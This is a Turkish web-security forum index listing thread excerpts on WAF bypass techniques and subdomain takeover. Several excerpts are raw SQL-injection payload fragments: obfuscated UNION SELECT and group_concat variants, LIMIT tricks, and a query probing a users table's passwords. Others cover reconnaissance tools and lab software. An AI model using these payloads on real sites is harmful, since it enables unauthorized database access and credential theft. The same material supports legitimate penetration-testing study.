Welcome, Visitor!
Hello, we are really happy that you have reached us. However, since you are viewing the forum as a visitor, you cannot benefit from many features of the forum. How about taking advantage of all the features exclusive to our members by registering? You can register right now, taking just 2 minutes of your time. We would love to see you among us.
webgüvenlik
-
WAF COLUMN BYPASS METHODLARI
COLUMN BYPASS METHODLARI Having+1=1 +and=0+ +div+0+ replace ' = %23 where 1=1 -
WAF LIMIT BYPASS METHODLARI
LIMIT BYPASS METHODLARI +LIMIT+0,1 +where+id+=1 WHERE ID_Produit='26 -- - +having+id+=1 +and length((select password from users having substr(pass,1,1)=’a')) [4] Null Parameter id=-1 id=null id=1+and+false+ id=9999 id=1 and 0 id==1 id=(-1) =1=1 +And+1=0 /*!and*/+1=0 -
WAF CONCAT BYPASS METODLARI
CONCAT BYPASS METODLARI group_concat() grOUp_ConCat(/*!*/,0x3e,/*!*/) group_concat(,0x3c62723e) g%72oup_c%6Fncat%28%76%65rsion%28%29,%22B3yaz%22%2 9 g%72oup_c%6Fncat%28%76%65rsion%28%29%2C%22B3yaz%22 %29 group_concat%28version%28%29%2C%22B3yaz%22%29 CoNcAt() concat() CoNcAt() CONCAT(DISTINCT )... -
WAF UNION SELECT BYPASS METHODLARI
UNION SELECT BYPASS METHODLARI +--+Union+--+Select+--+ +#uNiOn+#sEleCt+ +union+distinct+select+ +union+distinctROW+select+ +union%23aa%0Aselect+ 0%a0union%a0select%09 %0Aunion%0Aselect%0A +UnIoN+SeLselectECT+ /%2A%2A/union/%2A%2A/select/%2A%2A/ %2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/... -
WAF NEDİR ?
WAF Web Uygulamalarının Güvenlik Duvarlarıdır. Bir Sitenin sistemine sızmak istediğimizde onun içindeki web applicationlarda acık ararız. Peki bu acık türleri nelerdir ? -SQL İnjection -XSS(Cross Site Script) -LFI/RFI-(Local File İnclude)/(Remote File İnclude) -Command Injection -Code... -
bWAPP Nedir ?
bWAPP Nedir? Arkadaşlar bWAPP diye nitelendirdiğimiz şey Web güvenlik açıklarını hem saldırı hem de savunma taraflarını öğrenmek ve geliştirmek için kurulan bir scriptir. Bu script hem Windows işletim sisteminde hemde Kali Linux işletim sisteminde kullanılabilmektedir. Biz size Kali linux... -
SUBDOMAIN Zafiyet Tespitinde Otomatize Araçlar
ZAFİYET TESPİTİNDE OTOMATİZE ARAÇLAR Bunun için geliştirilmiş birçok araç var. Bir kısmını listelemek gerekirse: https://github.com/SaadAhmedx/Subdomain-Takeover https://github.com/michenriksen/aquatone https://github.com/haccer/subjack https://github.com/Ice3man543/SubOver... -
ZAFİYET TESPİT YÖNTEMLERİ
ZAFİYET TESPİT YÖNTEMLERİ Hedef hakkında yeterince bilgi sahibi olduysak artık tarama kısmına geçebiliriz. Bu süreçte otomatize araçları kullanabilir veya manuel taramalar gerçekleştirebiliriz. Yararlanabileceğimiz yöntemlerden bazıları: • Arama motorları (Google, Shodan, web dizinleri) Örnek... -
SUBDOMAIN Hedefi Keşfetmek
HEDEFİ KEŞFETMEK Hedef adrese yönelik zafiyet tespit çalışması yapılmadan önce hedefi tanımak gerekir. Dolayısıyla önce hedefe ait subdomain’lerin kapsamlı bir özeti çıkarılmalı ve daha sonra elde edilen bu verilerle zafiyet tarama işlemine devam edilmelidir. Bu işleme Reconnaissance yani Türkçe... -
SUBDOMAIN Hedef Odaklı Zafiyet Tespiti
HEDEF ODAKLI ZAFİYET TESPİTİ Söz konusu subdomain takeover olduğunda en çok kullanılan platformlara ve bunlardan bazılarının süreç boyunca tespitine değindik. Bu bölümden sonra hedef odaklı ilerleyeceğiz ve «hedefteki internet adreslerinde nasıl savunmasız bir subdomain bulunur, nasıl ilerlenir... -
SUBDOMAIN PLATFORMLAR
PLATFORMLAR Webmaster’lar; internet sitelerini birçok sebeple üçüncü taraf bir sağlayıcıda barındırabilir. Üzerinde çalışacağı bir sunucusunun olmaması, daha hızlı ve güvenilir bir çözüm arıyor olması, HTTP tabanlı atakların engellenmek istenmesi, DDoS koruması ve SSL sertifikası desteği gibi... -
SUBDOMAİN ZAFİYETE SEBEBİYET VEREN OLAYLAR
ZAFİYETE SEBEBİYET VEREN OLAYLAR ( FAKTÖRLER ) UNUTMAK «İnternet sitesi hiç unutulur mu?» demeyin. Bünyesinde 2 milyon subdomain barındıran internet siteleri var. Yetkililer oluşturdukları subdomain’i kurmayı unutabiliyorlar, süresi dolan servisleri tekrar aktif etmeyi unutabiliyorlar veya... -
SUBDOMAIN TAKEOVER Nedir ?
SUBDOMAIN TAKEOVER NEDİR? Subdomain’in ele geçirilmesi, kontrolün sistem yetkilileri dışındaki kişilerce ele alınmasına subdomain takeover diyoruz. Zafiyet sonucunda subdomain’i ele geçirmiş birisi, ilgili subdomain üzerinde tam kontrole sahip olur. Kendi dosyalarını yükleyebilir, kendi... -
SUBDOMAIN'LER Nasıl Çalışır ?
SUBDOMAIN’LER NASIL ÇALIŞIR? Subdomain’ler de teknik olarak aynen domain’ler gibi çalışır. Subdomain ve domain’in birleşmesine, yani tam URL’e hostname diyoruz.